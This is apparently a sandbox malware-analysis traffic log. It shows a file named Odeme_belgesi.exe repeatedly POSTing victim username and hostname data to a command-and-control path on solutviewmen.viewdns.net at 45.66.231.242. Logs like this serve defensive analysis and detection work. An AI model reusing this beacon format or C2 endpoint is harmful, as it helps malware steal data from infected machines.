Oct 1, 2024 10:55:11.258225918 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:11.424407005 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:11.431406975 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:12.104274988 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:12.286014080 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:12.290925980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:12.998677969 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49742	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:13.151530981 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:13.156783104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:13.904510975 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49744	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:14.054187059 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:14.059014082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:14.895996094 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49747	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:15.176146984 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:15.181876898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:15.839649916 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49749	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:15.996802092 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:16.001641035 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:16.898814917 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:17.052355051 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:17.057243109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:20.761219025 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:20.931056023 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:20.935914040 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:21.654897928 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:21.803811073 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:21.808725119 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:22.549278021 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:22.695430994 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:22.700321913 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:23.470480919 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:23.617074013 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:23.622009993 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:24.551815987 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:24.711334944 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:24.716378927 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:25.375000954 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:25.529371977 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:25.534367085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:26.195318937 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:26.356507063 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:26.361457109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:27.085490942 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:27.255765915 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:27.260785103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:27.951433897 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:28.106476068 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:28.111445904 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:28.839479923 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:28.992115974 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:28.997000933 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:29.661706924 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:29.802953959 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:29.807740927 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:30.557697058 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:30.725789070 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:30.730772018 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:31.394030094 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:31.536519051 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:31.541451931 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:32.194015026 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:32.340009928 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:32.344918966 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:33.024852037 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
